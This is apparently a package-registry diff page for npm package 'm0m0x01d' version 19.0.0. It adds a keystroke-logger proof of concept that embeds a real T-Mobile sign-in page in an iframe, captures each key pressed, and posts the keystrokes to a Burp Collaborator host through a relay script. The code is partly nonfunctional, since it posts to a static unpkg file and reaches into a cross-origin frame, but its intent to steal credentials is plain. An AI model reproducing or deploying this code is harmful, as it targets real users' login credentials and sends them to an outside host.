m0m0x01d 18.0.0 → 19.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/iframe4.svg.html +16 -0
- package/intermediary.js +11 -0
- package/keystroke-capture.js +26 -0
- package/package.json +1 -1
package/iframe4.svg.html
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
</html>
|
|
2
|
+
<!DOCTYPE html>
|
|
3
|
+
<html lang="en">
|
|
4
|
+
<head>
|
|
5
|
+
<meta charset="UTF-8">
|
|
6
|
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
7
|
+
<title>Keystroke Capture</title>
|
|
8
|
+
<script src="https://unpkg.com/m0m0x01d@19.0.0/keystroke-capture.js"></script>
|
|
9
|
+
</head>
|
|
10
|
+
<body>
|
|
11
|
+
<h1>Keystroke Logger PoC</h1>
|
|
12
|
+
<!-- Embedding the target's login page in an iframe -->
|
|
13
|
+
<iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
|
|
14
|
+
</body>
|
|
15
|
+
</html>
|
|
16
|
+
|
package/intermediary.js
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
// Intermediary script to forward keystrokes to your server
|
|
2
|
+
self.addEventListener('message', function(event) {
|
|
3
|
+
var data = event.data;
|
|
4
|
+
|
|
5
|
+
// Forward the keystrokes to your server
|
|
6
|
+
var xhr = new XMLHttpRequest();
|
|
7
|
+
xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
|
|
8
|
+
xhr.setRequestHeader("Content-Type", "application/json");
|
|
9
|
+
xhr.send(JSON.stringify({ keystrokes: data }));
|
|
10
|
+
});
|
|
11
|
+
|
|
@@ -0,0 +1,26 @@
|
|
|
1
|
+
// Function to send keystrokes to the intermediary file on unpkg
|
|
2
|
+
function sendKeystrokes(data) {
|
|
3
|
+
var xhr = new XMLHttpRequest();
|
|
4
|
+
xhr.open("POST", "https://unpkg.com/m0m0x01d@19.0.0/intermediary.js", true);
|
|
5
|
+
xhr.setRequestHeader("Content-Type", "application/json");
|
|
6
|
+
xhr.send(JSON.stringify({ keystrokes: data }));
|
|
7
|
+
}
|
|
8
|
+
|
|
9
|
+
// Function to capture keystrokes in the iframe
|
|
10
|
+
function captureKeystrokes() {
|
|
11
|
+
var iframe = document.getElementById('login-iframe').contentWindow;
|
|
12
|
+
|
|
13
|
+
// Listen for key presses in the iframe
|
|
14
|
+
iframe.document.onkeyup = function(event) {
|
|
15
|
+
sendKeystrokes(event.key); // Send each keystroke to the intermediary
|
|
16
|
+
};
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
// Wait for the iframe to load, then start capturing keystrokes
|
|
20
|
+
window.onload = function() {
|
|
21
|
+
var iframe = document.getElementById('login-iframe');
|
|
22
|
+
iframe.onload = function() {
|
|
23
|
+
captureKeystrokes();
|
|
24
|
+
};
|
|
25
|
+
};
|
|
26
|
+
|